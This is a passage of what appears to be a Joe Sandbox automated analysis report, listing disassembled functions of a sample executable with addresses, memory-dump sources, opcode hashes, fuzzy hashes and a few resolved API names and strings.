                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
                                                                                • Instruction ID: 2bd5ceebfd86916e9e9a4b3f567a583e9963e4f501914e9f436403abe4a6bc1b
                                                                                • Opcode Fuzzy Hash: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
                                                                                • Instruction Fuzzy Hash: 40429A36A0D6C686DB748F19B090B7E63D0EB9575AF105536EACEC7F98CE2CE4408B41
                                                                                Function 00007FF6CC387D60 Relevance: .6, Instructions: 583COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
                                                                                • Instruction ID: 5f20f5a9eae36ad99efd9297cdf9929a0e2a7920b8ae38367c859a0742bd73b4
                                                                                • Opcode Fuzzy Hash: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
                                                                                • Instruction Fuzzy Hash: 8E32FA31B1D6C186EA788E54B4A4E7E6293AF85751F20413BF9DEC7F94CE2CE8408B51
                                                                                Function 00007FF6CC347000 Relevance: .5, Instructions: 495COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
                                                                                • Instruction ID: 398ca90b89300ce5efb1f0c444075d9bd95225cccf640ba7853cb3405eca62e5
                                                                                • Opcode Fuzzy Hash: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
                                                                                • Instruction Fuzzy Hash: 2812F866A0D1C247EAB4CE387098A7E6EA19B42347F644832F6DDC67D4CE1EE944CF41
                                                                                Function 00007FF6CC382080 Relevance: .3, Instructions: 294COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
                                                                                • Instruction ID: ee0fb2899a856726d2d487ee85ef68d90f6408fd0558608ca850b129f1d49113
                                                                                • Opcode Fuzzy Hash: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
                                                                                • Instruction Fuzzy Hash: 35C1D462A0C6C187EA748E19B094F7A66D1EB84755F204437EECEC77E6CE3EE4409B05
                                                                                Function 00007FF6CC392D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: FA2$FA2$PG<;$PG<;
                                                                                • API String ID: 2738559852-1104478874
                                                                                • Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                                                • Instruction ID: 14dbee8358ccbbf483781395ddba08dd6158e1cec06c94a17f19bc47367e80d0
                                                                                • Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                                                • Instruction Fuzzy Hash: DD21AD16A0DAC241EA300F16B444B7A36609B4577AF144633FEEDCB7E0CE3ED8418784
                                                                                Function 00007FF6CC3B57D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: BoundaryDeleteDescriptor
                                                                                • String ID: 8qJ$9qJ$9qJ
                                                                                • API String ID: 3203483114-2728310733
                                                                                • Opcode ID: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
                                                                                • Instruction ID: 20def9dcfa7d61cf61868a7fee6a2ca9796c26509fa9d62edcd8971436f2bce8
                                                                                • Opcode Fuzzy Hash: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
                                                                                • Instruction Fuzzy Hash: A4017116F0CAC6C2F9764E1934B6E3904815F54753FF99832D88EC63A0ED18D9824321